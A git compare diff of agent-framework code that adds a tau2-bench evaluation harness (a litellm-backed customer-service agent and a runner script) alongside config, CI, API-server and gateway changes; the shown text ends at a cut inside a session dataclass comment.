Compare commits

..

2 Commits

Author SHA1 Message Date
Sam Herring
545809d09b Tau2 bench changes 2026-04-06 15:30:54 -07:00
Sam Herring
c32efc2885 Initial taubench implementation 2026-04-02 09:23:42 -07:00
35 changed files with 747 additions and 1566 deletions

View File

@@ -34,37 +34,9 @@ jobs:
- name: Run tests
run: |
source .venv/bin/activate
python -m pytest tests/ -q --ignore=tests/integration --ignore=tests/e2e --tb=short -n auto
python -m pytest tests/ -q --ignore=tests/integration --tb=short -n auto
env:
# Ensure tests don't accidentally call real APIs
OPENROUTER_API_KEY: ""
OPENAI_API_KEY: ""
NOUS_API_KEY: ""
e2e:
runs-on: ubuntu-latest
timeout-minutes: 10
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Install uv
uses: astral-sh/setup-uv@v5
- name: Set up Python 3.11
run: uv python install 3.11
- name: Install dependencies
run: |
uv venv .venv --python 3.11
source .venv/bin/activate
uv pip install -e ".[all,dev]"
- name: Run e2e tests
run: |
source .venv/bin/activate
python -m pytest tests/e2e/ -v --tb=short
env:
OPENROUTER_API_KEY: ""
OPENAI_API_KEY: ""
NOUS_API_KEY: ""

View File

@@ -426,7 +426,7 @@ class SessionManager:
config = load_config()
model_cfg = config.get("model")
default_model = ""
default_model = "anthropic/claude-opus-4.6"
config_provider = None
if isinstance(model_cfg, dict):
default_model = str(model_cfg.get("default") or default_model)

View File

@@ -189,13 +189,6 @@ TOOL_USE_ENFORCEMENT_GUIDANCE = (
# Add new patterns here when a model family needs explicit steering.
TOOL_USE_ENFORCEMENT_MODELS = ("gpt", "codex")
# Model name substrings that should use the 'developer' role instead of
# 'system' for the system prompt. OpenAI's newer models (GPT-5, Codex)
# give stronger instruction-following weight to the 'developer' role.
# The swap happens at the API boundary in _build_api_kwargs() so internal
# message representation stays consistent ("system" everywhere).
DEVELOPER_ROLE_MODELS = ("gpt-5", "codex")
PLATFORM_HINTS = {
"whatsapp": (
"You are on a text messaging communication platform, WhatsApp. "

View File

@@ -230,13 +230,7 @@ def get_all_skills_dirs() -> List[Path]:
def extract_skill_conditions(frontmatter: Dict[str, Any]) -> Dict[str, List]:
"""Extract conditional activation fields from parsed frontmatter."""
metadata = frontmatter.get("metadata")
# Handle cases where metadata is not a dict (e.g., a string from malformed YAML)
if not isinstance(metadata, dict):
metadata = {}
hermes = metadata.get("hermes") or {}
if not isinstance(hermes, dict):
hermes = {}
hermes = (frontmatter.get("metadata") or {}).get("hermes") or {}
return {
"fallback_for_toolsets": hermes.get("fallback_for_toolsets", []),
"requires_toolsets": hermes.get("requires_toolsets", []),

20
cli.py
View File

@@ -144,8 +144,8 @@ def load_cli_config() -> Dict[str, Any]:
# Default configuration
defaults = {
"model": {
"default": "",
"base_url": "",
"default": "anthropic/claude-opus-4.6",
"base_url": OPENROUTER_BASE_URL,
"provider": "auto",
},
"terminal": {
@@ -262,14 +262,6 @@ def load_cli_config() -> Dict[str, Any]:
elif isinstance(file_config["model"], dict):
# Old format: model is a dict with default/base_url
defaults["model"].update(file_config["model"])
# If the user config sets model.model but not model.default,
# promote model.model to model.default so the user's explicit
# choice isn't shadowed by the hardcoded default. Without this,
# profile configs that only set "model:" (not "default:") silently
# fall back to claude-opus because the merge preserves the
# hardcoded default and HermesCLI.__init__ checks "default" first.
if "model" in file_config["model"] and "default" not in file_config["model"]:
defaults["model"]["default"] = file_config["model"]["model"]
# Legacy root-level provider/base_url fallback.
# Some users (or old code) put provider: / base_url: at the
@@ -1103,7 +1095,7 @@ class HermesCLI:
# env vars would stomp each other.
_model_config = CLI_CONFIG.get("model", {})
_config_model = (_model_config.get("default") or _model_config.get("model") or "") if isinstance(_model_config, dict) else (_model_config or "")
_DEFAULT_CONFIG_MODEL = ""
_DEFAULT_CONFIG_MODEL = "anthropic/claude-opus-4.6"
self.model = model or _config_model or _DEFAULT_CONFIG_MODEL
# Auto-detect model from local server if still on default
if self.model == _DEFAULT_CONFIG_MODEL:
@@ -1987,12 +1979,10 @@ class HermesCLI:
base_url, _source,
)
else:
print("\n⚠️ Provider resolver returned an empty API key. "
"Set OPENROUTER_API_KEY or run: hermes setup")
self.console.print("[bold red]Provider resolver returned an empty API key.[/]")
return False
if not isinstance(base_url, str) or not base_url:
print("\n⚠️ Provider resolver returned an empty base URL. "
"Check your provider config or run: hermes setup")
self.console.print("[bold red]Provider resolver returned an empty base URL.[/]")
return False
credentials_changed = api_key != self.api_key or base_url != self.base_url

View File

@@ -193,10 +193,6 @@ class HermesAgentLoop:
import time as _time
prompt_token_ids = None
generation_token_ids = None
generation_log_probs = None
for turn in range(self.max_turns):
turn_start = _time.monotonic()
@@ -250,12 +246,6 @@ class HermesAgentLoop:
)
assistant_msg = response.choices[0].message
if hasattr(assistant_msg, "prompt_token_ids"):
prompt_token_ids = assistant_msg.prompt_token_ids
if hasattr(assistant_msg, "generation_token_ids"):
generation_token_ids = assistant_msg.generation_token_ids
if hasattr(assistant_msg, "generation_log_probs"):
generation_log_probs = assistant_msg.generation_log_probs
# Extract reasoning content from the response (all provider formats)
reasoning = _extract_reasoning_from_message(assistant_msg)
@@ -318,10 +308,7 @@ class HermesAgentLoop:
"content": assistant_msg.content or "",
"tool_calls": [_tc_to_dict(tc) for tc in assistant_msg.tool_calls],
}
if prompt_token_ids is not None:
msg_dict["prompt_token_ids"] = prompt_token_ids
msg_dict["generation_token_ids"] = generation_token_ids
msg_dict["generation_log_probs"] = generation_log_probs
# Preserve reasoning_content for multi-turn chat template handling
# (e.g., Kimi-K2's template renders <think> blocks differently
# for history vs. the latest turn based on this field)
@@ -484,10 +471,6 @@ class HermesAgentLoop:
}
if reasoning:
msg_dict["reasoning_content"] = reasoning
if prompt_token_ids is not None:
msg_dict["prompt_token_ids"] = prompt_token_ids
msg_dict["generation_token_ids"] = generation_token_ids
msg_dict["generation_log_probs"] = generation_log_probs
messages.append(msg_dict)
turn_elapsed = _time.monotonic() - turn_start

View File

@@ -0,0 +1,324 @@
"""
HermesAgent for tau2-bench evaluation.
Implements the tau2 HalfDuplexAgent interface using litellm with OpenRouter,
matching the inference path used across the rest of the Hermes Agent codebase.
Usage:
python environments/benchmarks/taubench/run_eval.py \\
--model anthropic/claude-sonnet-4-5 \\
--base-url openrouter \\
--env retail
"""
import json
import os
import sys
from pathlib import Path
from typing import Optional
import litellm
from pydantic import BaseModel
_repo_root = Path(__file__).resolve().parent.parent.parent.parent
if str(_repo_root) not in sys.path:
sys.path.insert(0, str(_repo_root))
from environments.tool_call_parsers import get_parser
from tau2.agent.base_agent import HalfDuplexAgent, ValidAgentInputMessage
from tau2.data_model.message import (
AssistantMessage,
Message,
MultiToolMessage,
SystemMessage,
ToolCall,
ToolMessage,
UserMessage,
)
from tau2.environment.tool import Tool
class HermesAgentState(BaseModel):
system_messages: list[SystemMessage]
messages: list
class HermesAgent(HalfDuplexAgent[HermesAgentState]):
"""
tau2 HalfDuplexAgent backed by litellm, using OpenRouter (or any
OpenAI-compatible endpoint).
Registered as "hermes_agent" in the tau2 registry by run_eval.py.
"""
SYSTEM_PROMPT = (
"You are a customer service agent that helps the user according to the "
"<policy> provided below.\n"
"In each turn you can either:\n"
"- Send a message to the user.\n"
"- Make a tool call.\n"
"You cannot do both at the same time.\n\n"
"Try to be helpful and always follow the policy. "
"Always make sure you generate valid JSON only.\n\n"
"<policy>\n{domain_policy}\n</policy>"
)
# System prompt variant for qwen3_coder tool format — tools are embedded
# directly in the system prompt as <tools> XML instead of passed via the
# OpenAI tools= parameter.
SYSTEM_PROMPT_QWEN3_CODER = (
"You are a customer service agent that helps the user according to the "
"<policy> provided below.\n"
"In each turn you can either:\n"
"- Send a message to the user.\n"
"- Make a tool call.\n"
"You cannot do both at the same time.\n\n"
"Try to be helpful and always follow the policy. "
"Always make sure you generate valid JSON only.\n\n"
"You may call one or more functions to assist with the user query.\n\n"
"You are provided with function signatures within <tools></tools> XML tags:\n"
"<tools>\n{tools_json}\n</tools>\n\n"
"<policy>\n{domain_policy}\n</policy>"
)
def __init__(
self,
tools: list[Tool],
domain_policy: str,
model: str,
base_url: Optional[str] = None,
api_key: Optional[str] = None,
temperature: float = 0.0,
max_tokens: Optional[int] = None,
top_p: Optional[float] = None,
thinking: bool = False,
tool_parser: Optional[str] = None,
):
super().__init__(tools=tools, domain_policy=domain_policy)
self.model = model
self.base_url = base_url
self.api_key = api_key
self.temperature = temperature
self.max_tokens = max_tokens
self.top_p = top_p
self.thinking = thinking
self.tool_parser = tool_parser
self._parser = get_parser(tool_parser) if tool_parser else None
# OpenRouter requires specific headers; pass them via litellm extra_headers
self._extra_headers: dict = {}
if base_url and "openrouter" in base_url.lower():
self._extra_headers = {
"HTTP-Referer": "https://hermes-agent.nousresearch.com",
"X-Title": "Hermes Agent",
}
@property
def system_prompt(self) -> str:
if self.tool_parser == "qwen3_coder" and self.tools:
tools_json = json.dumps(
[t.openai_schema for t in self.tools], indent=2, ensure_ascii=False
)
return self.SYSTEM_PROMPT_QWEN3_CODER.format(
tools_json=tools_json,
domain_policy=self.domain_policy,
)
return self.SYSTEM_PROMPT.format(domain_policy=self.domain_policy)
def get_init_state(
self, message_history: Optional[list[Message]] = None
) -> HermesAgentState:
return HermesAgentState(
system_messages=[SystemMessage(role="system", content=self.system_prompt)],
messages=list(message_history or []),
)
def generate_next_message(
self, message: ValidAgentInputMessage, state: HermesAgentState
) -> tuple[AssistantMessage, HermesAgentState]:
# Append incoming message(s) to history
if isinstance(message, MultiToolMessage):
state.messages.extend(message.tool_messages)
else:
state.messages.append(message)
# Build litellm-compatible message list
all_messages = state.system_messages + state.messages
lm_messages = [_to_litellm_message(m) for m in all_messages]
kwargs = dict(
model=self.model,
messages=lm_messages,
temperature=self.temperature,
)
if self.tools:
kwargs["tools"] = [t.openai_schema for t in self.tools]
if self.max_tokens is not None:
kwargs["max_tokens"] = self.max_tokens
if self.top_p is not None:
kwargs["top_p"] = self.top_p
# Enable thinking/reasoning mode. OpenRouter exposes this as
# `include_reasoning` for nemotron (per supported_parameters in the
# model metadata). Pass via extra_body to bypass litellm filtering.
if self.thinking:
kwargs["extra_body"] = {"include_reasoning": True}
# Only pass base_url when model doesn't already have a provider prefix
# (litellm uses either the prefix OR base_url, not both)
if self.base_url and not self.model.startswith("openrouter/"):
kwargs["base_url"] = self.base_url
if self.api_key:
kwargs["api_key"] = self.api_key
if self._extra_headers:
kwargs["extra_headers"] = self._extra_headers
response = litellm.completion(**kwargs)
assistant_msg = _litellm_response_to_assistant_message(response, parser=self._parser)
state.messages.append(assistant_msg)
return assistant_msg, state
# ---------------------------------------------------------------------------
# Conversion helpers
# ---------------------------------------------------------------------------
def _to_litellm_message(msg) -> dict:
"""Convert a tau2 message object to a litellm-compatible dict."""
if isinstance(msg, SystemMessage):
return {"role": "system", "content": msg.content or ""}
if isinstance(msg, UserMessage):
if msg.tool_calls:
# User tool calls (tau2 v2 feature — user has tools too)
return {
"role": "user",
"content": msg.content or "",
"tool_calls": [_tool_call_to_dict(tc) for tc in msg.tool_calls],
}
return {"role": "user", "content": msg.content or ""}
if isinstance(msg, AssistantMessage):
d: dict = {"role": "assistant", "content": msg.content or ""}
if msg.tool_calls:
d["tool_calls"] = [_tool_call_to_dict(tc) for tc in msg.tool_calls]
return d
if isinstance(msg, ToolMessage):
return {
"role": "tool",
"tool_call_id": msg.id,
"content": msg.content or "",
}
# Fallback
return {"role": getattr(msg, "role", "user"), "content": str(getattr(msg, "content", ""))}
def _tool_call_to_dict(tc: ToolCall) -> dict:
import json
return {
"id": tc.id or "call_0",
"type": "function",
"function": {
"name": tc.name,
"arguments": json.dumps(tc.arguments),
},
}
def _litellm_response_to_assistant_message(response, parser=None) -> AssistantMessage:
"""Convert a litellm ModelResponse to a tau2 AssistantMessage."""
import json
choice = response.choices[0]
msg = choice.message
content = msg.content or ""
tool_calls_raw = getattr(msg, "tool_calls", None)
tau2_tool_calls: Optional[list[ToolCall]] = None
if parser and content:
# Use the custom tool parser (e.g. qwen3_coder) to extract tool calls
# from the raw text response.
parsed_content, parsed_tool_calls = parser.parse(content)
if parsed_tool_calls:
content = parsed_content or ""
tau2_tool_calls = []
for tc in parsed_tool_calls:
try:
arguments = json.loads(tc.function.arguments or "{}")
except json.JSONDecodeError:
arguments = {}
tau2_tool_calls.append(
ToolCall(
id=tc.id or "call_0",
name=tc.function.name,
arguments=arguments,
requestor="assistant",
)
)
elif tool_calls_raw:
tau2_tool_calls = []
for tc in tool_calls_raw:
if hasattr(tc, "function"):
name = tc.function.name
try:
arguments = json.loads(tc.function.arguments or "{}")
except json.JSONDecodeError:
arguments = {}
tau2_tool_calls.append(
ToolCall(
id=tc.id or "call_0",
name=name,
arguments=arguments,
requestor="assistant",
)
)
cost = None
try:
cost = litellm.completion_cost(response)
except Exception:
pass
usage = None
if hasattr(response, "usage") and response.usage:
usage = dict(response.usage)
return AssistantMessage(
role="assistant",
content=content if not tau2_tool_calls else None,
tool_calls=tau2_tool_calls,
cost=cost,
usage=usage,
)
def create_hermes_agent(tools: list[Tool], domain_policy: str, **kwargs) -> HermesAgent:
"""
Factory function registered with the tau2 registry.
Expected kwargs:
model (str): litellm model string
base_url (str): API base URL (optional)
api_key (str): API key (optional)
temperature (float): sampling temperature (default 0.0)
top_p (float): nucleus sampling (optional)
max_tokens (int): max tokens (optional)
thinking (bool): enable reasoning/thinking mode (default False)
"""
return HermesAgent(
tools=tools,
domain_policy=domain_policy,
model=kwargs["model"],
base_url=kwargs.get("base_url"),
api_key=kwargs.get("api_key"),
temperature=kwargs.get("temperature", 0.0),
top_p=kwargs.get("top_p"),
max_tokens=kwargs.get("max_tokens"),
thinking=kwargs.get("thinking", False),
tool_parser=kwargs.get("tool_parser"),
)

View File

@@ -0,0 +1,288 @@
"""
tau2-bench evaluation runner for Hermes Agent.
Runs the tau2-bench retail, airline, telecom, or banking_knowledge evaluation
using HermesAgent backed by litellm — the same inference path used across the
rest of the Hermes Agent codebase.
Usage:
# Against OpenRouter (auto-detects OPENROUTER_API_KEY)
python environments/benchmarks/taubench/run_eval.py \\
--model openrouter/anthropic/claude-sonnet-4-5 \\
--base-url openrouter \\
--env retail
# Against OpenAI directly
python environments/benchmarks/taubench/run_eval.py \\
--model gpt-4o \\
--env retail
# Local vLLM
python environments/benchmarks/taubench/run_eval.py \\
--model openai/NousResearch/Hermes-3-Llama-3.1-70B \\
--base-url http://localhost:8000/v1 \\
--env retail \\
--num-trials 3
# Specific tasks only
python environments/benchmarks/taubench/run_eval.py \\
--model openrouter/anthropic/claude-sonnet-4-5 \\
--base-url openrouter \\
--env retail \\
--task-ids task_1 task_2 task_5
Results are saved to results/tau2bench/ as JSON.
Dependencies (requires Python 3.12+):
pip install "tau2 @ git+https://github.com/sierra-research/tau2-bench.git"
# or: pip install -e ".[tau2bench]"
"""
import argparse
import logging
import os
import sys
from pathlib import Path
from typing import Optional
_repo_root = Path(__file__).resolve().parent.parent.parent.parent
if str(_repo_root) not in sys.path:
sys.path.insert(0, str(_repo_root))
from tau2.data_model.simulation import Results, TextRunConfig
from tau2.evaluator.evaluator import EvaluationType
from tau2.registry import registry
from tau2.runner.batch import run_tasks
from tau2.runner.helpers import get_tasks
from environments.benchmarks.taubench.hermes_agent import create_hermes_agent
logging.basicConfig(
level=logging.INFO, format="%(asctime)s %(levelname)s %(name)s: %(message)s"
)
logger = logging.getLogger(__name__)
OPENROUTER_BASE_URL = "https://openrouter.ai/api/v1"
AGENT_NAME = "hermes_agent"
def _register_agent(
model: str,
base_url: Optional[str],
api_key: Optional[str],
temperature: float,
top_p: Optional[float],
max_tokens: Optional[int],
thinking: bool,
tool_parser: Optional[str],
) -> None:
"""Register the HermesAgent factory with the tau2 registry (idempotent)."""
if registry.get_agent_factory(AGENT_NAME) is not None:
return
def factory(tools, domain_policy, **kwargs):
return create_hermes_agent(
tools=tools,
domain_policy=domain_policy,
model=model,
base_url=base_url,
api_key=api_key,
temperature=temperature,
top_p=top_p,
max_tokens=max_tokens,
thinking=thinking,
tool_parser=tool_parser,
)
registry.register_agent_factory(factory=factory, name=AGENT_NAME)
logger.info("Registered agent factory: %s (model=%s, thinking=%s, tool_parser=%s)", AGENT_NAME, model, thinking, tool_parser)
def run_eval(
model: str,
base_url: Optional[str],
api_key: Optional[str],
user_model: str,
env_name: str,
task_split: Optional[str],
num_trials: int,
max_concurrency: int,
max_steps: int,
temperature: float,
top_p: Optional[float],
max_tokens: Optional[int],
thinking: bool,
tool_parser: Optional[str],
task_ids: Optional[list],
start_index: int,
end_index: int,
log_dir: str,
seed: int,
) -> Results:
# Resolve OpenRouter shorthand
if base_url and base_url.strip().lower() == "openrouter":
base_url = OPENROUTER_BASE_URL
is_openrouter = base_url and "openrouter" in base_url.lower()
# litellm requires the "openrouter/" prefix to route correctly
if is_openrouter and not model.startswith("openrouter/"):
model = f"openrouter/{model}"
if is_openrouter and not user_model.startswith("openrouter/"):
user_model = f"openrouter/{user_model}"
# Resolve API key
if is_openrouter:
api_key = api_key or os.environ.get("OPENROUTER_API_KEY") or os.environ.get("OPENAI_API_KEY")
# litellm reads OPENAI_API_KEY for base_url overrides; set it so the
# user simulator's generate() call also authenticates correctly.
if api_key and not os.environ.get("OPENAI_API_KEY"):
os.environ["OPENAI_API_KEY"] = api_key
else:
api_key = api_key or os.environ.get("OPENAI_API_KEY")
_register_agent(
model=model,
base_url=base_url,
api_key=api_key,
temperature=temperature,
top_p=top_p,
max_tokens=max_tokens,
thinking=thinking,
tool_parser=tool_parser,
)
# Load tasks — task_ids in tau2 are strings like "task_1"
tasks = get_tasks(
task_set_name=env_name,
task_split_name=task_split,
task_ids=[str(i) for i in task_ids] if task_ids else None,
)
if not task_ids and (end_index != -1 or start_index != 0):
end = end_index if end_index != -1 else len(tasks)
tasks = tasks[start_index:end]
logger.info(
"Running tau2-%s eval: %d tasks, %d trial(s), concurrency=%d",
env_name, len(tasks), num_trials, max_concurrency,
)
save_path = Path(log_dir) / f"tau2-{env_name}-{model.split('/')[-1]}.json"
save_path.parent.mkdir(parents=True, exist_ok=True)
# Pass api_key/base_url to user sim via llm_args so tau2's generate() authenticates.
# When using OpenRouter for the user sim, mirror the agent's key + endpoint.
user_llm_args: dict = {}
if is_openrouter and api_key:
user_llm_args["api_key"] = api_key
user_llm_args["base_url"] = base_url
config = TextRunConfig(
domain=env_name,
agent=AGENT_NAME,
user="user_simulator",
llm_agent=model,
llm_args_agent={},
llm_user=user_model,
llm_args_user=user_llm_args,
num_trials=num_trials,
max_steps=max_steps,
max_concurrency=max_concurrency,
seed=seed,
)
results = run_tasks(
config,
tasks,
save_path=save_path,
console_display=True,
# ALL: respects each task's reward_basis. NL assertions are skipped
# gracefully (scored as pass) rather than raising an error, so tasks
# are evaluated only on their actual basis components (DB, ACTION, etc.)
evaluation_type=EvaluationType.ALL,
)
logger.info("Results saved to %s", save_path)
return results
def main():
parser = argparse.ArgumentParser(
description="Run tau2-bench evaluation with Hermes Agent (requires Python 3.12+)",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument(
"--model", required=True,
help="litellm model string, e.g. 'openrouter/anthropic/claude-sonnet-4-5' or 'gpt-4o'",
)
parser.add_argument(
"--base-url", default=None,
help="API base URL. Use 'openrouter' as shorthand for https://openrouter.ai/api/v1.",
)
parser.add_argument("--api-key", default=None, help="API key (falls back to OPENROUTER_API_KEY / OPENAI_API_KEY)")
parser.add_argument("--temperature", type=float, default=1.0,
help="Sampling temperature. NVIDIA used 1.0 for nemotron-super.")
parser.add_argument("--top-p", type=float, default=0.95,
help="Nucleus sampling. NVIDIA used 0.95 for nemotron-super.")
parser.add_argument("--max-tokens", type=int, default=None)
parser.add_argument("--thinking", action="store_true", default=False,
help="Enable reasoning/thinking mode (use_reasoning=true). "
"Required to match NVIDIA's reported nemotron-super scores.")
parser.add_argument("--tool-parser", default=None,
help="Tool call parser to use (e.g. 'qwen3_coder'). When set, tools are "
"embedded in the system prompt as <tools> XML and responses are parsed "
"from raw text instead of using OpenAI function calling format.")
parser.add_argument(
"--user-model", default="qwen/qwen3-235b-a22b-2507:nitro",
help="litellm model string for the tau2 user simulator. "
"Defaults to qwen/qwen3-235b-a22b-2507:nitro (instruct, non-thinking) to match NVIDIA's eval setup. "
"When using --base-url openrouter the openrouter/ prefix is added automatically.",
)
parser.add_argument(
"--env", default="retail",
choices=["retail", "airline", "telecom", "banking_knowledge", "mock"],
)
parser.add_argument(
"--task-split", default=None,
help="Task split name (e.g. 'base'). Defaults to the domain default.",
)
parser.add_argument("--num-trials", type=int, default=1)
parser.add_argument("--max-concurrency", type=int, default=8)
parser.add_argument("--max-steps", type=int, default=50)
parser.add_argument(
"--task-ids", nargs="*", default=None,
help="Specific task IDs to run (tau2 task IDs are strings like 'task_1')",
)
parser.add_argument("--start-index", type=int, default=0)
parser.add_argument("--end-index", type=int, default=-1)
parser.add_argument("--seed", type=int, default=10)
parser.add_argument("--log-dir", default="results/tau2bench")
args = parser.parse_args()
run_eval(
model=args.model,
base_url=args.base_url,
api_key=args.api_key,
user_model=args.user_model,
env_name=args.env,
task_split=args.task_split,
num_trials=args.num_trials,
max_concurrency=args.max_concurrency,
max_steps=args.max_steps,
temperature=args.temperature,
top_p=args.top_p,
max_tokens=args.max_tokens,
thinking=args.thinking,
tool_parser=args.tool_parser,
task_ids=args.task_ids,
start_index=args.start_index,
end_index=args.end_index,
log_dir=args.log_dir,
seed=args.seed,
)
if __name__ == "__main__":
main()

View File

@@ -1,144 +0,0 @@
#!/usr/bin/env python3
"""
Quick compatibility check: connect to a local OpenAI-compatible endpoint
and run a single agent turn via HermesAgentLoop with all standard tools.
Usage:
python environments/check_gym_compat.py # auto-detect model
python environments/check_gym_compat.py --model my-model # explicit model
python environments/check_gym_compat.py --base-url http://... --model ...
"""
import asyncio
import argparse
import json
import logging
import sys
from pathlib import Path
# Ensure repo root is on sys.path when run as a standalone script
_repo_root = str(Path(__file__).resolve().parent.parent)
if _repo_root not in sys.path:
sys.path.insert(0, _repo_root)
import requests
from openai import AsyncOpenAI
from environments.agent_loop import HermesAgentLoop, AgentResult
from model_tools import get_tool_definitions
logging.basicConfig(level=logging.INFO, format="%(levelname)s %(name)s: %(message)s")
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Thin server wrapper — gives HermesAgentLoop the chat_completion() it wants
# ---------------------------------------------------------------------------
class OpenAIServer:
"""Minimal async server wrapping an OpenAI-compatible endpoint."""
def __init__(self, base_url: str, model: str, api_key: str = "dummy"):
self.model = model
self.client = AsyncOpenAI(base_url=base_url, api_key=api_key)
async def chat_completion(self, **kwargs):
kwargs.setdefault("model", self.model)
return await self.client.chat.completions.create(**kwargs)
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
def detect_model(base_url: str) -> str:
try:
resp = requests.get(f"{base_url}/models", timeout=10)
resp.raise_for_status()
models = resp.json().get("data", [])
if not models:
print("WARNING: /v1/models returned no models")
return "default"
model_id = models[0]["id"]
print(f"Auto-detected model: {model_id}")
return model_id
except Exception as e:
print(f"Could not auto-detect model ({e}), falling back to 'default'")
return "default"
async def run_check(base_url: str, model: str, message: str) -> AgentResult:
server = OpenAIServer(base_url=base_url, model=model)
# Get all default hermes tools
tool_schemas = get_tool_definitions(quiet_mode=False)
valid_names = {t["function"]["name"] for t in tool_schemas}
agent = HermesAgentLoop(
server=server,
tool_schemas=tool_schemas,
valid_tool_names=valid_names,
max_turns=5,
)
messages = [
{"role": "system", "content": "You are a helpful assistant with access to tools."},
{"role": "user", "content": message},
]
return await agent.run(messages)
# ---------------------------------------------------------------------------
# Main
# ---------------------------------------------------------------------------
def main():
parser = argparse.ArgumentParser(description="Check gym endpoint compatibility")
parser.add_argument("--base-url", default="http://127.0.0.1:11746/v1")
parser.add_argument("--model", default=None)
parser.add_argument("--message", default="Hello! What's the current directory you're in?")
args = parser.parse_args()
model = args.model or detect_model(args.base_url)
print(f"\n{'='*60}")
print(f"Endpoint: {args.base_url}")
print(f"Model: {model}")
print(f"Message: {args.message}")
print(f"{'='*60}\n")
try:
result = asyncio.run(run_check(args.base_url, model, args.message))
print(f"\n{'='*60}")
print(f"Turns used: {result.turns_used}")
print(f"Finished naturally: {result.finished_naturally}")
print(f"Tool errors: {len(result.tool_errors)}")
print(f"{'='*60}")
# Print the final assistant response
for msg in reversed(result.messages):
# if msg.get("role") == "assistant" and msg.get("content"):
# print("\nRESPONSE:")
# print(msg["content"])
# break
print(msg)
if result.tool_errors:
print("\nTOOL ERRORS:")
for err in result.tool_errors:
print(f" turn {err.turn}: {err.tool_name}{err.error}")
status = "✅ passed" if result.finished_naturally else "⚠️ hit max turns"
print(f"\nGym compatibility check {status}")
except Exception as e:
print(f"\n❌ Gym compatibility check failed: {e}")
import traceback
traceback.print_exc()
sys.exit(1)
if __name__ == "__main__":
main()

View File

@@ -2,7 +2,7 @@
OpenAI-compatible API server platform adapter.
Exposes an HTTP server with endpoints:
- POST /v1/chat/completions — OpenAI Chat Completions format (stateless; opt-in session continuity via X-Hermes-Session-Id header)
- POST /v1/chat/completions — OpenAI Chat Completions format (stateless)
- POST /v1/responses — OpenAI Responses API format (stateful via previous_response_id)
- GET /v1/responses/{response_id} — Retrieve a stored response
- DELETE /v1/responses/{response_id} — Delete a stored response
@@ -300,7 +300,6 @@ class APIServerAdapter(BasePlatformAdapter):
self._runner: Optional["web.AppRunner"] = None
self._site: Optional["web.TCPSite"] = None
self._response_store = ResponseStore()
self._session_db: Optional[Any] = None # Lazy-init SessionDB for session continuity
@staticmethod
def _parse_cors_origins(value: Any) -> tuple[str, ...]:
@@ -497,23 +496,7 @@ class APIServerAdapter(BasePlatformAdapter):
status=400,
)
# Allow caller to continue an existing session by passing X-Hermes-Session-Id.
# When provided, history is loaded from state.db instead of from the request body.
provided_session_id = request.headers.get("X-Hermes-Session-Id", "").strip()
if provided_session_id:
session_id = provided_session_id
try:
if self._session_db is None:
from hermes_state import SessionDB
self._session_db = SessionDB()
history = self._session_db.get_messages_as_conversation(session_id)
except Exception as e:
logger.warning("Failed to load session history for %s: %s", session_id, e)
history = []
else:
session_id = str(uuid.uuid4())
# history already set from request body above
session_id = str(uuid.uuid4())
completion_id = f"chatcmpl-{uuid.uuid4().hex[:29]}"
model_name = body.get("model", "hermes-agent")
created = int(time.time())
@@ -557,7 +540,7 @@ class APIServerAdapter(BasePlatformAdapter):
return await self._write_sse_chat_completion(
request, completion_id, model_name, created, _stream_q,
agent_task, agent_ref, session_id=session_id,
agent_task, agent_ref,
)
# Non-streaming: run the agent (with optional Idempotency-Key)
@@ -616,11 +599,11 @@ class APIServerAdapter(BasePlatformAdapter):
},
}
return web.json_response(response_data, headers={"X-Hermes-Session-Id": session_id})
return web.json_response(response_data)
async def _write_sse_chat_completion(
self, request: "web.Request", completion_id: str, model: str,
created: int, stream_q, agent_task, agent_ref=None, session_id: str = None,
created: int, stream_q, agent_task, agent_ref=None,
) -> "web.StreamResponse":
"""Write real streaming SSE from agent's stream_delta_callback queue.
@@ -637,8 +620,6 @@ class APIServerAdapter(BasePlatformAdapter):
cors = self._cors_headers_for_origin(origin) if origin else None
if cors:
sse_headers.update(cors)
if session_id:
sse_headers["X-Hermes-Session-Id"] = session_id
response = web.StreamResponse(status=200, headers=sse_headers)
await response.prepare(request)

View File

@@ -1280,8 +1280,8 @@ class GatewayRunner:
try:
self.session_store._ensure_loaded()
for key, entry in list(self.session_store._entries.items()):
if entry.memory_flushed:
continue # already flushed this session (persisted to disk)
if entry.session_id in self.session_store._pre_flushed_sessions:
continue # already flushed this session
if not self.session_store._is_session_expired(entry):
continue # session still active
# Session has expired — flush memories in the background
@@ -1292,15 +1292,7 @@ class GatewayRunner:
try:
await self._async_flush_memories(entry.session_id, key)
self._shutdown_gateway_honcho(key)
# Mark as flushed and persist to disk so the flag
# survives gateway restarts.
with self.session_store._lock:
entry.memory_flushed = True
self.session_store._save()
logger.info(
"Pre-reset memory flush completed for session %s",
entry.session_id,
)
self.session_store._pre_flushed_sessions.add(entry.session_id)
except Exception as e:
logger.debug("Proactive memory flush failed for %s: %s", entry.session_id, e)
except Exception as e:
@@ -6194,7 +6186,7 @@ def _start_cron_ticker(stop_event: threading.Event, adapters=None, interval: int
logger.info("Cron ticker stopped")
async def start_gateway(config: Optional[GatewayConfig] = None, replace: bool = False, verbosity: Optional[int] = 0) -> bool:
async def start_gateway(config: Optional[GatewayConfig] = None, replace: bool = False) -> bool:
"""
Start the gateway and run until interrupted.
@@ -6296,21 +6288,6 @@ async def start_gateway(config: Optional[GatewayConfig] = None, replace: bool =
logging.getLogger().addHandler(file_handler)
logging.getLogger().setLevel(logging.INFO)
# Optional stderr handler — level driven by -v/-q flags on the CLI.
# verbosity=None (-q/--quiet): no stderr output
# verbosity=0 (default): WARNING and above
# verbosity=1 (-v): INFO and above
# verbosity=2+ (-vv/-vvv): DEBUG
if verbosity is not None:
_stderr_level = {0: logging.WARNING, 1: logging.INFO}.get(verbosity, logging.DEBUG)
_stderr_handler = logging.StreamHandler()
_stderr_handler.setLevel(_stderr_level)
_stderr_handler.setFormatter(RedactingFormatter('%(levelname)s %(name)s: %(message)s'))
logging.getLogger().addHandler(_stderr_handler)
# Lower root logger level if needed so DEBUG records can reach the handler
if _stderr_level < logging.getLogger().level:
logging.getLogger().setLevel(_stderr_level)
# Separate errors-only log for easy debugging
error_handler = RotatingFileHandler(
log_dir / 'errors.log',

View File

@@ -364,12 +364,6 @@ class SessionEntry:
auto_reset_reason: Optional[str] = None # "idle" or "daily"
reset_had_activity: bool = False # whether the expired session had any messages
# Set by the background expiry watcher after it successfully flushes
# memories for this session. Persisted to sessions.json so the flag
# survives gateway restarts (the old in-memory _pre_flushed_sessions
